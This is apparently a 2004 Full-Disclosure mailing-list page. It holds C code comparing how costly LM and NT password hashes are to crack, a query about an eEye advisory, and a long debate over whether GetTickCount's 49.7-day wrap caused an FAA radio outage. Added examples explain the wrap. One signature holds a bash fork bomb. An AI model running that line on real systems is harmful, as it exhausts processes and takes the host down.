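    if (n > 128) n = 128;
    for (size_t i = 0; i < n; i++) { wide[2 * i] = (uint8_t)pw[i]; wide[2 * i + 1] = 0; }
    md4(wide, 2 * n, h);
    for (int i = 0; i < 16; i++) sprintf(out + 2 * i, "%02x", h[i]);
}

int nt_hash_matches(const char *pw, const char *hex_expected)
{
    char hex[33];
    nt_hash_hex(pw, hex);
    return strcmp(hex, hex_expected) == 0;
}

/* LM preprocessing: upper-case, cut or NUL-pad to 14 bytes, split into two
 * 7-byte halves that DES (not shown) hashes independently. Returns how many
 * halves an attacker must crack: 0 if longer than 14 (Windows stores no LM
 * hash at all), 1 if 7 or fewer (second half empty, a fixed value), else 2. */
int lm_halves_to_crack(const char *pw)
{
    uint8_t half[2][7] = {{0}};
    size_t n = strlen(pw);
    if (n > 14) return 0;
    for (size_t i = 0; i < n; i++) half[i / 7][i % 7] = (uint8_t)toupper((unsigned char)pw[i]);
    return n <= 7 ? 1 : 2;
}

/* Exhaustive-search guesses. Assumed charsets: 69 printable ASCII symbols
 * survive LM's upper-casing and the halves are attacked one at a time (the
 * work adds); NT keeps all 95 printable symbols over the whole length. */
static double power(double b, size_t e) { double r = 1; while (e--) r *= b; return r; }

double lm_guesses(size_t len)
{
    if (len > 14) return 0;                          /* nothing stored to attack */
    size_t h1 = len < 7 ? len : 7, h2 = len > 7 ? len - 7 : 0;
    return power(69, h1) + (h2 ? power(69, h2) : 0);
}

double nt_guesses(size_t len) { return power(95, len); }

int main(void)
{
    const char *samples[] = {"password", "Passw0rd!", "correct horse battery staple"};
    for (int i = 0; i < 3; i++) {                     /* constructed samples */
        char hex[33]; nt_hash_hex(samples[i], hex);
        printf("%-29s NT %s  LM halves %d  guesses LM %.3g / NT %.3g\n", samples[i], hex,
               lm_halves_to_crack(samples[i]), lm_guesses(strlen(samples[i])), nt_guesses(strlen(samples[i])));
    }
    return 0;
}
```

Build with any C99 compiler and run. The output shows that a 14-character
password costs an attacker about 2 x 69^7 LM guesses against 95^14 for the NT
hash, and that a 28-character passphrase leaves no LM hash to attack at all,
which is the whole of joe's recommendation in one table.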

Re: [Full-Disclosure] EEYE: Windows Shell ZIP File Decompression DUNZIP32.DLL Buffer Overflow Vulnerability

2004-10-13 Thread Joe Stewart
A few things I've noticed with this advisory: eEye states that the 
vulnerability is an overflow in dunzip32.dll and that MS04-034 fixes 
it. However, from what I've seen MS04-034 only patches zipfldr.dll. 
Further, MS04-034 claims that Windows ME is not vulnerable, while eEye 
says it is. Also, eEye says that the dunzip32.dll overflow is an issue 
for XP, yet I am unable to find dunzip32.dll on a stock XP SP1 system. 
Is it possible that the eEye release and the MS04-034 bulletin are 
talking about two separate issues?

-Joe

-- 
Joe Stewart, GCIH 
Senior Security Researcher
LURHQ http://www.lurhq.com/



RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

2004-09-25 Thread joe
Definitely some interesting theories Ron.

 1 the code was better done under the original OS, unix

While possible, nothing actually points at this as being the case. Anyway, I
would be curious as to the functionality of the system when it was first
launched on UNIX versus the end-result. Put this on Windows and run it 10
years and then port to UNIX or *nix and there will almost certainly be
screwups there as well. In fact, I would be pretty confident. I have dealt
with poor ports to and from Windows and *nix. I have even dealt with bad
ports from Mainframes to UNIX where the whole time the Mainframe people were
saying the same types of things about UNIX that you like to say about
Windows. Being a good coder for one OS doesn't make you one for all OSes
when dealing with system level components and interfaces. 


 2 considering how often you seems to run into this same 
 issue with other coders in the windows realm, windows coders 
 tend to be especially lazy/clueless as compared to coders in other OS'

I would expect the issue is the same as always. Sheer volume. There are good
and bad coders period. Microsoft has surely drawn more poor coders than any
other OS with its pushing of the RAD/simple coding environment such as VB.
Additionally the Windows environment as a whole has more inexperienced users
and admins and people likely to try and code. There are also many good ones
as well, they are just well buried in the poor ones.


 3 tools to code with in the windows realm are not as developed/functional
 as they are in other envs

I would say this opinion is uninformed.


 4 M$ does not properly provide developers with clued information with
 which to do their jobs

This is another opinion which I would call rather uninformed. 

Even if there was poor function documentation, if you have a function, any
function returning a constantly increasing counter you know, as a skilled
programmer, that eventually it has to do something other than increase. If
the value is signed the sign bit will flip or if it is unsigned it will roll
to 0. How can a good programmer think any other thing? The compiler could
have inserted exception handling code but at best that is simply going to
bounce the program out of a normal running state. That is a compiler thing
though, not an OS thing. I do hope you aren't trying to tell me that UNIX
can magically and infinitely maintain a counter on a variable with a fixed
bit size. I try to consider you to be a bit more intelligent than that.



To put it in another way, if you have a set of tires on a car that are rated
for 75 MPH (say off road truck tires) and some person goes 90 and the tires
fly apart or the vehicle flips or both, is the issue the driver, the vehicle
manufacturer, the tire manufacturer, or the tree that produced the rubber
for the tire? This is the same sort of case. You have it in your mind ahead
of time who you want to be at fault because you have a bug up your bum about
it and work to prove that stance. 

Poor coding is a result of poor coders. I have seen amazingly bad code on
all OS/RTS platforms I have worked on from RSTS to BSD to Linux to Windows
to DOS to VMS. I have also seen some amazingly good stuff on the same
platforms. Someone who doesn't understand basic data types and how to handle
their limits is going to do a shitty job on all of the platforms. 

Is the ratio of good admins to bad admins better in UNIX versus Windows?
Absolutely. Is the ratio of good programmers to bad programmers better in
UNIX versus Windows? Most certainly. Does this mean all Windows admins are
bad admins, obviously not. Does this mean all Windows programmers are bad
programmers, obviously not. I specifically say UNIX versus *nix because I
think *nix is one or more steps closer to Windows in this discussion and
getting closer as its popularity grows with Windows users. Switching to *nix
doesn't make the admins or coders switching (or just using in tandem) any
better simply because they switched.





 

-Original Message-
From: Ron DuFresne [mailto:[EMAIL PROTECTED] 
Sent: Friday, September 24, 2004 11:25 PM
To: joe
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

On Fri, 24 Sep 2004, joe wrote:

 Again, there are valid uses of GetTickCount and there are safe ways of 
 doing so. If there is concern, I do recommend testing functionality 
 associated with each of the DLLs. You might find a bug you can report for
kudos.

 On the incident, I would guess the vendor never had a clue it would do
that.


 That function can't return more than 49.7 days without breaking every 
 app that currently uses it. MS can not do that. That is why there is 
 another function to get the info with a different datatype. See my other
posts.


What seems to read clearly from your replies to this thread is that either;

1 the code was better done under the original OS, unix

2 considering how often you seems to run

RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

2004-09-24 Thread joe
Nod. Some knucklehead used GetTickCount or clock() for their app and had no
clue about datatypes and overflows and range of possible values and some
people go off on Windows.

I was helping someone in the public newsgroups with a similar issue.
Experienced 10-year C coder who didn't understand why a long value would
go negative and start counting down... He could have been coding for Windows
or anything else. Unfortunately he chose Windows so his app contributes to
people thinking Windows doesn't work. 

The state of programming right now is like the state of the roads in
Michigan. Mostly in disrepair and everyone blaming the weather instead of
poor road building skills. In the meanwhile the Dept of Transpotation keeps
hiring inexperienced road workers for some poor salary and using lowest
bidder to build the roads and expecting them to miraculously get better.

  joe



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of ASB
Sent: Friday, September 24, 2004 7:22 AM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

That has nothing to do with Windows, and everything to do with a stupid
application.

...as if stupid app developers are solely the products of Windows
environments.

-ASB

On Fri, 24 Sep 2004 11:32:29 +0200 (CEST), Feher Tamas [EMAIL PROTECTED]
wrote:
 http://www.techworld.com/opsys/news/index.cfm?NewsID=2275
 
 Next time think twice before replacing Un*x with Voles!




RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

2004-09-24 Thread joe
 are you speaking for m$?

Of course not, but I don't have the legal liability they have either and my
dev staff is the staff of one so I can get to the people in the know rather
quicker than MS. Plus I don't have to be politically correct and be nice
about it. 


 you know that not able to comment basically means screwed ?

It does? I could think it means they talked to press people and they didn't
want to just talk, they wanted to wait for someone who knew code could look
into the issue. If the press person just quickly responded, someone would
beat them for that as well. There are a lot of people out there that just
like to beat on MS regardless of what is said. 


  joe 



-Original Message-
From: Georgi Guninski [mailto:[EMAIL PROTECTED] 
Sent: Friday, September 24, 2004 10:47 AM
To: joe
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

On Fri, Sep 24, 2004 at 09:28:08AM -0400, joe wrote:
 Nod. Some knucklehead used GetTickCount or clock() for their app and 
 had no clue about datatypes and overflows and range of possible values 
 and some people go off on Windows.


joo,

are you speaking for m$?

the article clearly states:

 Microsoft told Techworld it was aware of the reports but was not
immediately able to comment.

you know that not able to comment basically means screwed ?

--
where do you want bill gates to go today?


 




RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

2004-09-24 Thread joe
From the article

The servers are timed to shut down after 49.7 days of use in order to
prevent a data overload, a union official told the LA Times. To avoid this
automatic shutdown, technicians are required to restart the system manually
every 30 days. An improperly trained employee failed to reset the system,
leading it to shut down without warning, the official said.

And

Soon after installation, however, the FAA discovered that the system design
could lead to a radio system shutdown, and put the maintenance procedure
into place as a workaround, the LA Times said. The FAA reportedly said it
has been working on a permanent fix but has only eliminated the problem in
Seattle. The FAA is now planning to institute a second workaround - an alert
that will warn controllers well before the software shuts down.


It would appear that the VSCS shut down, not the system. Further it would
appear that someone failed to reboot the system and caused this, not that
the system hung or died mid-restart. 

This article combined with other discussions makes it sound like the app
itself had issue, the system didn't crash or drop. Kernel memory wasn't
corrupted etc.  

The fact that they want it rebooted and the time frame mentioned, 49.7 days
which happens to coincide perfectly with when the 32 bit DWORD output from
GetTickCount has to roll over to 0, means they are probably basing some
timing info off the output of GetTickCount and can't properly handle the
rollover. GetTickCount is based off system start date.

http://msdn.microsoft.com/library/default.asp?url=/library/en-us/sysinfo/base/gettickcount.asp


Options are to have a thread managing your own timer values based on some
floating point type or 64 bit integer or 64 bit high resolution timers (all
of which just moves the problem further out and are all available right now
and have been for some time) or properly handle the datatype used. 

A popular option which is even worse is to base things off the system clock.
While you don't have to worry about a rollover for a long long time with
Windows FILETIME (64 bit) and epoch if using ctime, at that point then you
start getting all sorts of timing issues due to time correction software or
the user changing the time. 

Anyway, had they used high resolution timers
(QueryPerformanceCounter/QueryPerformanceFrequency) instead of GetTickCount
they would have been working with an API available since like NT3.1/Win9x
and would have been using 64 bit INTs and if I recall correctly wouldn't
have had an issue until the system had been up for something like 100 years
(200 if using unsigned) which obviously could NEVER happen with a Windows
system. Been a while since I worked out the details of those functions.
Anyway, many coders avoid them because they don't like working with 64 bit
INTs.



 joe


 

-Original Message-
From: Barry Fitzgerald [mailto:[EMAIL PROTECTED] 
Sent: Friday, September 24, 2004 10:15 AM
To: joe
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

joe wrote:

  

Where issues like this relate to the OS is in the fact that the OS itself
shouldn't be brought down by a poorly designed app.

Of course, you can shoot yourself in the foot in any OS, but an overflow in
a local app should never take down the kernel.  Unfortunately, memory
management in MS Windows (though it's gotten better over time) is still not
up to par and that is what causes a number of these issues.  Not to mention
poor system architecture and design on the part of MS.

Was it MS Windows that actually held the code that brought the system down?

Well, that depends on how far down you want to drill and where you place the
burden of OS stability.  If you place it on the OS, then Windows is fair
game.  If you place the burden of OS stability on the app, then you're
foolish and don't understand OS design concepts.  :)  (said in jest, but
then, so is most truth)

The article doesn't make the situation entirely clear.  Did the app
intentionally restart the system and foul it?  Did the restart occur because
the app crashed?  I'm skeptical because technical details like this are
usually confused, mislabeled, or misreported... even
(especially?) in tech rags.  So, who holds the burden in this case depends
on the answers to the questions above.

-Barry



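
Added example (editor's code, not from any post in this thread) working
through the 49.7-day wrap joe describes in the message above and in the other
replies above about GetTickCount and a long value going negative. No Windows
API is called: tick values are passed in explicitly so the wrap can be
reproduced in seconds rather than 49.7 days. The 64-bit extension at the end
is one assumed way an application could have kept counting across the wrap,
not what the FAA's vendor actually did.

```c
/* Added example, not code from any post in this thread: a 32-bit millisecond
 * tick counter (what GetTickCount() returns) wraps to 0 after 2^32 ms, about
 * 49.7 days. Below is the arithmetic that breaks at the wrap and the
 * arithmetic that survives it. No Windows headers are used; tick values are
 * supplied by the caller so the wrap can be exercised without waiting. */
#include <stdint.h>
#include <stdio.h>
#include <stdbool.h>

/* 2^32 ms in days: 4294967296 / 86400000 = 49.71 */
double wrap_period_days(void)
{
    return 4294967296.0 / (86400.0 * 1000.0);
}

/* Broken: widen both ticks to a signed 64-bit type and subtract. This is the
 * "long value goes negative and starts counting down" mistake: once the
 * counter wraps, now < start and the result is hugely negative. */
int64_t naive_elapsed_ms(uint32_t now, uint32_t start)
{
    return (int64_t)now - (int64_t)start;
}

/* Correct: subtract in uint32_t. Unsigned arithmetic is modulo 2^32, so the
 * difference is right for any interval shorter than one full wrap. */
uint32_t elapsed_ms(uint32_t now, uint32_t start)
{
    return now - start;
}

/* Broken: an absolute comparison. If deadline = start + timeout wrapped to a
 * small number, now >= deadline is already true and the timeout fires at once. */
bool naive_deadline_passed(uint32_t now, uint32_t deadline)
{
    return now >= deadline;
}

/* Correct for intervals under 2^31 ms (about 24.8 days): the sign of the
 * modular difference says which side of the deadline we are on, wrap or not.
 * Casting the uint32_t difference to int32_t assumes two's complement, which
 * every Windows compiler provides. */
bool deadline_passed(uint32_t now, uint32_t deadline)
{
    return (int32_t)(now - deadline) >= 0;
}

/* Extending the counter to 64 bits in software: remember the last value seen
 * and count wraps. Assumed approach, valid as long as the counter is polled
 * at least once per 49.7 days; the article's 30-day manual restart is that
 * same requirement met by hand instead of in code. */
typedef struct { uint64_t wraps; uint32_t last; } tick64_t;

uint64_t tick64_update(tick64_t *t, uint32_t now)
{
    if (now < t->last)
        t->wraps++;                /* the 32-bit counter passed 0 since last poll */
    t->last = now;
    return (t->wraps << 32) | now;
}

/* Walk a tick64_t across a simulated wrap and return the extended value. */
uint64_t tick64_demo(void)
{
    tick64_t t = { 0, 0 };
    tick64_update(&t, 0xFFFFFF00u);         /* 256 ms before the wrap */
    return tick64_update(&t, 0x00000100u);  /* 256 ms after it: 2^32 + 256 */
}

int main(void)
{
    uint32_t start = 0xFFFFFF00u, now = 0x00000100u;   /* straddle the wrap */
    uint32_t deadline = start + 400u;                    /* wraps to 0x90 */
    printf("wrap period: %.2f days\n", wrap_period_days());
    printf("naive elapsed: %lld ms, modular elapsed: %u ms\n",
           (long long)naive_elapsed_ms(now, start), elapsed_ms(now, start));
    printf("128 ms in, naive says deadline passed: %d, modular says: %d\n",
           naive_deadline_passed(start + 128u, deadline),
           deadline_passed(start + 128u, deadline));
    printf("64-bit extended tick after wrap: %llu\n",
           (unsigned long long)tick64_demo());
    return 0;
}
```

The naive deadline check is the one that matches the article's symptom: a
timeout computed as start plus an interval wraps to a small value, every
comparison against it is immediately true, and whatever that timer guarded
misbehaves until a reboot resets the counter. The modular forms need no
reboot at all.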


RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

2004-09-24 Thread joe
I agree you should be able to rely on the products.

What is apparently at fault here is a vendor using a value from a system
function incorrectly or if you wish, using an incorrect system function for
their purpose. I'm pretty confident they weren't rebooting these servers for
Windows to function, it was a matter of the resetting the tick count for the
application.

  joe
 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Frank Knobbe
Sent: Friday, September 24, 2004 11:01 AM
To: Barry Fitzgerald
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

On Fri, 2004-09-24 at 09:15, Barry Fitzgerald wrote:
 The article doesn't make the situation entirely clear.  Did the app 
 intentionally restart the system and foul it?  Did the restart occur 
 because the app crashed?

No, no, the problem was human error because a tech didn't reboot the
system. It's clearly operator error, not a problem with any systems at all. 

Unfortunately, there is some truth in this. We (and not just the media) are
starting to put blame on humans far too quickly. Is this justified?
On one hand, they are only tools for us to do our job. On the other hand,
they are products that we should be able to rely on. Who do we blame?
Operators or products?

Cheers.
Frank




RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

2004-09-24 Thread joe
I read that article differently than you. 

It seems you read it that a system backup (i.e. something backing up data)
failed. I read that an operator didn't reboot the system and the software
designed to catch that and handle it failed. 


An improperly trained employee failed to reset the system, leading it to
shut down without warning, the official said. Backup systems failed because
of a software failure,


Note Backup systemS. I.E. Operator was first line of defense, an automated
system was the backup and it didn't fire. Probably due to failure to test
it. 



 The article implied (though didn't outright state it) that the Unix
systems did not include regular reboots.

That is stretching I think what they wrote, but it is probably accurate
though several large companies I know do UNIX reboots every Sunday maint
window right along with Windows reboots. Anyway, what your statement of
implication implies to me is the vendor knew how to code UNIX apps and
didn't know how to code Windows apps.


I think you are absolutely incorrect on why the reboot was needed. It wasn't
to clear memory, it was to reset the system counter so that gettickcount
doesn't overflow the DWORD.

  joe


 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Barry
Fitzgerald
Sent: Friday, September 24, 2004 11:15 AM
To: Frank Knobbe
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

Frank Knobbe wrote:

On Fri, 2004-09-24 at 09:15, Barry Fitzgerald wrote:
  

The article doesn't make the situation entirely clear.  Did the app 
intentionally restart the system and foul it?  Did the restart occur 
because the app crashed?



No, no, the problem was human error because a tech didn't reboot the 
system. It's clearly operator error, not a problem with any systems at 
all.

  

I disagree - if the system were engineered properly, a reboot would not be
necessary to keep the system from falling on its face.

The article implied (though didn't outright state it) that the Unix systems
did not include regular reboots.  I don't know enough about the engineering
of the system to state whether this was caused by the app, the OS, or some
dependency issue.

But, in a critical system of this nature, relying on scheduled reboots for
operation sends a signal to me that there's a problem in the system.

Unfortunately, there is some truth in this. We (and not just the media) 
are starting to put blame on humans far too quickly. Is this justified?
On one hand, they are only tools for us to do our job. On the other 
hand, they are products that we should be able to rely on. Who do we 
blame? Operators or products?


  

That depends on the situation.  If a system can be engineered to operate
properly on its own, then it should be.  All else is operator error.  I
think it most depends on the rationality of the automated requirement.

If the backup fails because said user forgets to change the backup tapes,
then the problem is human error.
If the backup fails because said product doesn't properly flush its buffers
and sends all data to /dev/null, then the issue is software error, even if
it's a known condition that has had procedure put in place to work around
it.  The argument for automation is rational and supposed to be in the
system, and thus it's an error in the engineering.

The second scenario is similar to what we had here.  All a reboot does is
ensure that the memory has been cleared.  If their developers don't know how
to do this in code, or if they choose OS' that can't reliably do this, then
either fire the developers and/or the decision makers, because they didn't
do their jobs and people could have died because of that. 

 -Barry

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

2004-09-24 Thread joe
There were actually worse foul ups from poor developers using that function.
And I agree, the ones who did it weren't too intelligent or informed on what
they were dealing with. Doesn't mean that windows is a product of stupid
developers but parts of it could certainly be pointed at as an argument for
it. :o)  

  joe

  

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Frank Knobbe
Sent: Friday, September 24, 2004 10:09 AM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

On Fri, 2004-09-24 at 06:21, ASB wrote:
 That has nothing to do with Windows, and everything to do with a 
 stupid application.
 
 ...as if stupid app developers are solely the products of Windows
environments.

No. But according to that logic it seems that Windows is a product of stupid
developers.

http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/q216/6/41.aspNoWebContent=1





RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

2004-09-24 Thread joe
It says right in the article they were running Windows 2000 Advanced Server.
The systems were not impacted by the Win95 hang bug. Almost certainly
Windows was fine... period. The communication software puked based on the
same API function that the Windows 95 Dev guys screwed up with. The value
rolls over and either the application software detects that and shuts down
the application or the application crashes because of poor exception
handling.

If Windows crashed of its own accord, then yes, MS needs to share some
blame. If, what actually happened is a crappy app died and the OS was fine
the whole time, the responsibility rests with the application vendor and the
design/implementation team.

Should technicians be rebooting boxes as fixes? Absolutely not. However,
before assuming it is an OS issue, understand why they are rebooting it. In
this case I expect it was to reset the tick count for the application
itself. If it is because the app is eating all the memory up, that is one
hellacious memory leak they need to work on in the app. 


  joe



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Michal Zalewski
Sent: Friday, September 24, 2004 2:32 PM
To: ASB
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

On Fri, 24 Sep 2004, ASB wrote:

 The servers are timed to shut down after 49.7 days of use in order to 
 prevent a data overload, a union official told the LA Times.

 How you managed to read OS failure into this is rather astounding...

The statement above, even though either cleverly disguised by the
authorities, or mangled by the press, does ring a bell. It is not about
applications eating up too much memory, hence requiring an occasional
reboot, oh no.

Windows 9x had a problem (fixed by Microsoft, by the way) that caused them
to hang or crash after a jiffie counter in the kernel overflowed:

  http://support.microsoft.com/support/kb/articles/q216/6/41.asp

It would happen precisely after 49.7 days. Coincidence? Not very likely.
It seems that the system was running on unpatched Windows 95 or 98, and
rather than deploying a patch, they came up with a maintenance procedure
requiring a scheduled reboot every 30 days.

This is one hell of a ridiculous idea, and any attempt to blame a failure on
a technician who failed to reboot the box is really pushing it.

It is not uncommon for telecommunications, medical, flight control, banking
and other mission-critical applications to run on terribly ancient software
(and with a clause that requires them NOT to be updated, because the
software is not certified against those patches).

In the end, the OS and decision-makers that implemented the system and
established ill-conceived workarounds should split the blame.

/mz




RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

2004-09-24 Thread joe
You certainly like to assume. 

MS being aware doesn't mean they are involved. Even if they are, I suspect
they will not go around saying that the vendor screwed up. They will simply
help them with it. On a daily basis MS sends people into companies and
corrects and troubleshoots things vendors did incorrectly. I have friends in
MCS and that is pretty much all they do day in and day out, correct what
partners and vendors made mistakes on in customer sites. The
vendors/partners tend to be pissy about it but not quite as pissy if MS went
around telling everyone publicly whose stuff they had to throw out and redo.

On the MS puppet piece, you once again have no clue of what you speak. 

  joe 


-Original Message-
From: Georgi Guninski [mailto:[EMAIL PROTECTED] 
Sent: Friday, September 24, 2004 3:58 PM
To: joe
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

joo,

i don't want to read shit written by m$ puppets.

clearly m$ is involved in this incident according to the press.

enough days passed since the incident (hahahahaha).

where is the official m$ reply?

--
where do you want bill gates to go today?



RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

2004-09-24 Thread joe
 C:\WINDOWS\system32>find "GetTickCount" kernel32.dll
 
 ---------- KERNEL32.DLL
 GetTickCount

Umm yeah. That would be the DLL that exports the function. :o)

Anyway, even if it is used, if used with understanding of the data value
range it can be used safely. I have used it safely (as have many coders) many
times in the past when manipulating 64 bit numbers associated with
QueryPerformanceCounter would have been overkill.

  joe

 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of bashis
Sent: Friday, September 24, 2004 3:35 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

Hi list,

Regarding GetTickCount() [1] it might be a good idea to schedule reboot of
Windows boxes within 49.7 days, just in case..

Even M$ folks make mistakes [2] when they are using this function.

Hm, I wonder what this is used for.. ? ;-)

C:\WINDOWS\system32>find "GetTickCount" kernel32.dll

---------- KERNEL32.DLL
GetTickCount

C:\WINDOWS\system32>

Well, M$ never stops surprising me.. ;-)

Have a nice day
/bashis

[1]
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/sysinfo/base/gettickcount.asp

[2]
http://support.microsoft.com/default.aspx?scid=kb;en-us;318152
http://support.microsoft.com/default.aspx?scid=kb;en-us;823273




RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

2004-09-24 Thread joe
Other articles state that as  

which replaced the original servers with off-the-shelf Dell hardware
running Microsoft Windows 2000 Advanced Server

Also there are other mentions of Windows Servers replacing UNIX servers.
Don't think I have ever met someone who would be willing to call Win9x a
server. 

 but it seems that the only valid approximation of what it could originally
mean is an OS problem.

It is a valid approximation of lots of apps that have problems with
GetTickCount including MS themselves. In the years of helping companies and
their vendors I have seen MANY occurrences of this problem. It is an
extremely common problem. The number one reason given by vendors when I
approach them on it is they weren't aware of another function to get a
timer. The second reason was that they were aware but didn't like working
with 64 bit integers which can be a pain in some compilers/languages. 

  - Why would they use such a ridiculous counter? Applications usually
do not have to count time on their own, and usually rely on RTC data.
Counting milliseconds seems futile, though I suppose it could be
just a matter of an obscure design.

There are valid uses for counters like this, usually for
sequencing/synchronization. I can't say anything other than you haven't had
experience with them. Granted many uses of handling time in an app this way
would be better served with an event driven timer or signals, but not all
coders are comfortable doing things like that. The non-hardware specific RTC
capability from windows is through the high resolution timers though even MS
doesn't call Windows (other than CE/Embedded) a RT OS. The next closest
approximation is through GetTickCount which is there to give an easy 32 bit
answer to things, again because many coders don't like 64 bit integers.


  - Why wouldn't the same code fail on unix previously?

Who says it is the same code? The fact that it does fail at 49.7 days would
seem to indicate to me it isn't because they are using some different method
of doing the timing, not number of ms since start time in a 32 bit value. 


  - Why would they claim again and again that this was an OS feature?

Because the people speaking don't code and the vendor probably said so. I
heard the same thing out of a vendor a couple of years ago when a company
contacted me about a timer that would start counting down after the program
ran for many days. The vendor was screwing up in how they used clock() which
returns an unsigned long. They swore up and down it was MS's fault until I
wrote code and duplicated exactly what they were doing and had another
example side by side with it that worked perfectly. I just the other day
dealt in the newsgroups with another vendor who ran into the exact same
problem with clock(). The issue is no or incomplete understanding of basic
data types. 


 joe


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Michal Zalewski
Sent: Friday, September 24, 2004 5:26 PM
To: joe
Cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

On Fri, 24 Sep 2004, joe wrote:

 It says right in the article they were running Windows 2000 Advanced
Server.
 The systems were not impacted by the Win95 hang bug. Almost certainly 
 Windows was fine... period.

Ahem... the most informative piece I could find reads:

http://www.latimes.com/news/local/la-me-faa16sep16,1,3729661.story

 When the system was upgraded about a year ago, the original [unix]
 computers were replaced by Dell computers using Microsoft software.
 Baggett said the Microsoft software contained an internal clock
 designed to shut the system down after 49.7 days to prevent it from
 becoming overloaded with data.

This appears to be a fine example of meaningless gibberish, but it seems
that the only valid approximation of what it could originally mean is an OS
problem. Which is consistent with what we know about old Microsoft OSes.

Sure, the same problem could happen if the application running on that box
used a 32-bit integer to store millisecond count since its launch - but:

  - Why would they use such a ridiculous counter? Applications usually
do not have to count time on their own, and usually rely on RTC data.
Counting milliseconds seems futile, though I suppose it could be
just a matter of an obscure design.

  - Why wouldn't the same code fail on unix previously?

  - Why would they claim again and again that this was an OS feature?

It seems that all the claims support the OS flaw version, though of course
it's not a good idea to trust the press on technical issues.

Until we know more, getting into an off-topic, groundless flamewar is not
needed.

--
- bash$ :(){ :|:};: --  Michal Zalewski *
[http://lcamtuf.coredump.cx]
Did you know that clones never use mirrors?
--- 2004-09-24 23:08 --

   http://lcamtuf.coredump.cx/photo/current

RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

2004-09-24 Thread joe
Again, there are valid uses of GetTickCount and there are safe ways of doing
so. If there is concern, I do recommend testing functionality associated
with each of the DLLs. You might find a bug you can report for kudos.

On the incident, I would guess the vendor never had a clue it would do that.


That function can't return more than 49.7 days without breaking every app
that currently uses it. MS can not do that. That is why there is another
function to get the info with a different datatype. See my other posts.

  joe


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of bashis
Sent: Friday, September 24, 2004 5:47 PM
To: joe
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11

 
  C:\WINDOWS\system32>find "GetTickCount" kernel32.dll
  
  ---------- KERNEL32.DLL
  GetTickCount
 
 Umm yeah. That would be the DLL that exports the function. :o)
Yes, perhaps, but do a search in \windows and \windows\system32 and you will
find several programs using (or exporting;) this function. ;-)

 Anyway, even if it is used, if used with understanding of the data 
 value range it can used safely. I have used it safely (as have many 
 coders) many times in the past when manipulating 64 bit numbers 
 associated with QueryPerformanceCounter would have been overkill.
Yes, of course it can be used safely.

My wild guess about that incident is that the programmer(s) who coded the
application didn't get that it will wrap to zero after 49.7 days, and as
workaround they told the customer to reboot their servers with the reason
Windows, it's crappy.. you know..

We can argue about if the return is right or wrong from GetTickCount(),
even if the function was well documented and the coders were missing the
magic word 49.7 days, I really don't care.

But, my personal opinion is that a "The return value is the number of
milliseconds that have elapsed since the system was started" function
should return more than 49.7 days, but hey.. M$ perhaps doesn't expect more
uptime on their OSes.. ;-)

Well, I don't know if GetTickCount() is the cause of the incident, it
was only something I noticed when I was searching and reading about
functions/bugs with the magic word 49.7 days ;-)

I am glad that the incident turned out w/o any human losses.

Have a nice day
/bashis



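The GetTickCount wrap argued over across this thread, as an added example that is not code from any of the posts: a 32-bit millisecond counter rolls over after 2^32 ms, about 49.7 days, and the code below puts the two idioms that break at the rollover (an absolute deadline computed as start + timeout, and a "clock went backwards" sanity check of the kind that would make an application shut itself down) next to the unsigned-subtraction idiom that survives it. Tick values are passed in explicitly so the example compiles and runs on any platform; the only assumption is that on Windows they would be the return value of GetTickCount().

```c
/*
 * Added example, not code from the thread: GetTickCount() returns an
 * unsigned 32-bit millisecond count that wraps after 2^32 ms (~49.7 days).
 * Tick values are passed in as parameters so this builds anywhere; on
 * Windows `now` would be the return value of GetTickCount() (assumption).
 */
#include <stdint.h>
#include <stdio.h>

typedef uint32_t DWORD;                 /* Win32 DWORD: unsigned 32-bit */

#define MS_PER_DAY (24u * 60u * 60u * 1000u)

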